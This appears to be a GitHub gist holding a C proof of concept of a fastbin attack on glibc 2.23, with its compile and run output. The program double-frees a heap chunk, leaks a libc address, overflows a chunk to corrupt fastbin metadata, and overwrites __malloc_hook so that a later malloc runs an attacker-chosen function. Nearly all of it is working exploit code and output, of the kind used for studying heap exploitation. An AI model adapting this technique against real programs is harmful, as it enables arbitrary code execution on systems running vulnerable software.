overwrite malloc_hook by fastbins unlink attack
| #include <stdio.h> | |
| #include <stdlib.h> | |
| #include <string.h> | |
| void jackpot() { puts("jackpot!"); } | |
| int main() | |
| { | |
| puts("[+] allocate p1, p2"); | |
| char *p1 = malloc(0x100); | |
| char *p2 = malloc(0x100); | |
| printf("p1 = %p\n", p1); | |
| printf("p2 = %p\n", p2); | |
| puts("\n[+] free p1, p2"); | |
| free(p1); | |
| free(p2); | |
| puts("\n[+] allocate p3"); | |
| char *p3 = malloc(0x100); | |
| printf("p3 = %p\n", p3); | |
| puts("\n[+] p1 double free"); | |
| free(p1); | |
| puts("\n[+] leak libc address via p3"); | |
| void *arena_top = *(void **)p3; | |
| void *malloc_hook = arena_top - 0x68; | |
| printf("arena_top = %p\n", arena_top); | |
| printf("malloc_hook = %p\n", malloc_hook); | |
| puts("\n[+] allocate p4"); | |
| char *p4 = malloc(0x100); | |
| printf("p4 = %p\n", p4); | |
| puts("\n[+] allocate p5 with size 0x60"); | |
| char *p5 = malloc(0x60); | |
| printf("p5 = %p\n", p5); | |
| puts("\n[+] free p5"); | |
| free(p5); | |
| puts("\n[+] abuse p4 overflow"); | |
| memset(p4, 'A', 0x100); | |
| *(void **)(p4+0x108) = 0x71; | |
| *(void **)(p4+0x110) = (void *)malloc_hook-0x20-3; | |
| puts("\n[+] allocate p6, p7 with size 0x60"); | |
| char *p6 = malloc(0x60); | |
| char *p7 = malloc(0x60); | |
| printf("p6 = %p\n", p6); | |
| printf("p7 = %p\n", p7); | |
| puts("\n[+] overwrite *(p7+0x13) = malloc_hook"); | |
| memset(p7, 'A', 0x13); | |
| *(void **)(p7+0x13) = jackpot; | |
| puts("\n[+] allocate p8"); | |
| char *p8 = malloc(0x100); | |
| printf("p8 = %p\n", p8); | |
| return 0; | |
| } |
| $ gcc fastbins_malloc_hook.c -o fastbins_malloc_hook | |
| fastbins_malloc_hook.c: In function ‘main’: | |
| fastbins_malloc_hook.c:45:26: warning: assignment makes pointer from integer without a cast [-Wint-conversion] | |
| *(void **)(p4+0x108) = 0x71; | |
| ^ | |
| $ ./fastbins_malloc_hook | |
| [+] allocate p1, p2 | |
| p1 = 0xd36420 | |
| p2 = 0xd36530 | |
| [+] free p1, p2 | |
| [+] allocate p3 | |
| p3 = 0xd36420 | |
| [+] p1 double free | |
| [+] leak libc address via p3 | |
| arena_top = 0x7f30e669eb78 | |
| malloc_hook = 0x7f30e669eb10 | |
| [+] allocate p4 | |
| p4 = 0xd36420 | |
| [+] allocate p5 with size 0x60 | |
| p5 = 0xd36530 | |
| [+] free p5 | |
| [+] abuse p4 overflow | |
| [+] allocate p6, p7 with size 0x60 | |
| p6 = 0xd36530 | |
| p7 = 0x7f30e669eafd | |
| [+] overwrite *(p7+0x13) = malloc_hook | |
| [+] allocate p8 | |
| jackpot! | |
| p8 = 0x9 | |
| $ /lib/x86_64-linux-gnu/libc.so.6 | |
| GNU C Library (Ubuntu GLIBC 2.23-0ubuntu3) stable release version 2.23, by Roland McGrath et al. | |
| Copyright (C) 2016 Free Software Foundation, Inc. | |
| This is free software; see the source for copying conditions. | |
| There is NO warranty; not even for MERCHANTABILITY or FITNESS FOR A | |
| PARTICULAR PURPOSE. | |
| Compiled by GNU CC version 5.3.1 20160413. | |
| Available extensions: | |
| crypt add-on version 2.1 by Michael Glad and others | |
| GNU Libidn by Simon Josefsson | |
| Native POSIX Threads Library by Ulrich Drepper et al | |
| BIND-8.2.3-T5B | |
| libc ABIs: UNIQUE IFUNC | |
| For bug reporting instructions, please see: | |
| <https://bugs.launchpad.net/ubuntu/+source/glibc/+bugs>. |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment